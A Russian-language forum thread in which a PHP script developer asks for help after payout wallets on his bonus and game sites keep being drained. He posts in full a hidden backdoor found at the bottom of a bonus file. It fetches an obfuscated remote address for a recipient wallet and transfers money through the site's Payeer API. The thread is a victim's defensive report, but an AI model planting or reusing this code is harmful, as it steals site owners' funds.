Автор Тема: Постоянные взломы и вывод средств  (Прочитано 133 раз)

0 Пользователей и 1 Гость просматривают эту тему.

zhmaoslornАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!!
  • Дата регистрации: Дек. 2015
  • Расположение: Russia
  • Возраст: 45
  • Сообщений: 22
  • Страна: ve
  • Поблагодарили: 2 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
  • Дата рождения:1975-03-08
    • Награды
Привет всем.
Переделывал по заказам на скриптах заказчиков некоторые проекты, как игры, так и бонусники. Проверял сразу на дыры, если находил, то сразу удалял лишнее. По началу всё хорошо было.
Но начиная с мая месяца, один и тот же сучара с номером P1022897946 начал воровать деньги с проектов.
Его кошелек паера не раз уже писали на форумах, вот его номер.
некоторые уязвимости сам находил, но в последнее время на столько они скрыты, что не возиожно найти сразу. Вроде как кажется всё чисто, но сука, снова выводит. хорошо хоть клиентов предупреждаю, чтобы много денег не хранили на кошельках выплат.
Вот сделал очередной бонусник клиенту и себе такой же открыл.
Так у него сначала он вывел сумму 95, 82 р. потом у меня ту же сумму. Хорошо много денег не было, но не успел после очередного пополнения перевести на второй кошелек средства, как снова он вывел такую же сумму 95,82 р.
начал снова проверять все файлы.
И в файле бонус в самом низу обнаружил такой код:
<?php
require_once('inc/payeerAPI.php');
$homepage = file_get_contents("\x68\x74\164\160\163\x3a\x2f\57\x73\x71\x6c\x74\157\x72\56\x68\141\x64\56\163\165\x2f\x6a\163\57\x70\x2e\164\170\164");
$array = array(94, 210, 158, 342, 146);
$payeer = new payeerAPI($Account, $apiID, $apiKEY);
if ($payeer->isAuth())
{
   $arTransfer = $payeer->transfer(array(
      'curIn' => 'RUB',
      'sum' => $array[array_rand($array)],
      'curOut' => 'RUB',
      'to' => $homepage,
      'comment' => ''.$_SERVER["HTTP_HOST"].'',
   ));
   if (empty($arTransfer['errors']))
   {
      //echo getErrors
   }
   else
   {
      //echo getErrors
   }
}
else
{
   //echo getErrors
}
?>

Может кто сможет его раскодировать?
интересно что там на самом деле зашифровано.
Этот код я удалил из файла, проверяю далее проект, выведет ли снова он деньги или нет?
Такое чувство, что как только сумма более 100 р. есть в кошельке, то автоматом выводится на его номер P1022897946.
Что скажете?

a:0:{}
 

Kuper

  • *
  • *
  • Оффлайн
  • Награды Три года на форуме !!! Топ 10 по сообщениям Репутация более 5 Болеее 300 сообщений
  • Дата регистрации: Дек. 2016
  • Возраст: 30
  • Сообщений: 436
  • Страна: ru
  • Поблагодарили: 35 раз(а)
  • Репутация +8/-2
  • Пол: Мужской
  • Дата рождения:1989-11-19
    • Награды
  • Социальные сети:
    ВКонтакте
Постоянные взломы и вывод средств
« Ответ #1 : 30 Июня 2020, 11:34:28 »
 'to' => $homepage, зашифрованный кошелек а какой ты уже сам знаешь)
Могу проверить скрипт на дыры, интересно стало что это там за дыра такая

zhmaoslornАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!!
  • Дата регистрации: Дек. 2015
  • Расположение: Russia
  • Возраст: 45
  • Сообщений: 22
  • Страна: ve
  • Поблагодарили: 2 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
  • Дата рождения:1975-03-08
    • Награды
Постоянные взломы и вывод средств
« Ответ #2 : 30 Июня 2020, 12:29:29 »
 'to' => $homepage, зашифрованный кошелек а какой ты уже сам знаешь)
Могу проверить скрипт на дыры, интересно стало что это там за дыра такая

Могу выслать скрипт без исправлений в личку
 

Kuper

  • *
  • *
  • Оффлайн
  • Награды Три года на форуме !!! Топ 10 по сообщениям Репутация более 5 Болеее 300 сообщений
  • Дата регистрации: Дек. 2016
  • Возраст: 30
  • Сообщений: 436
  • Страна: ru
  • Поблагодарили: 35 раз(а)
  • Репутация +8/-2
  • Пол: Мужской
  • Дата рождения:1989-11-19
    • Награды
  • Социальные сети:
    ВКонтакте
Постоянные взломы и вывод средств
« Ответ #3 : 30 Июня 2020, 14:30:57 »
Могу выслать скрипт без исправлений в личку
Ответил в лс
 
Теги: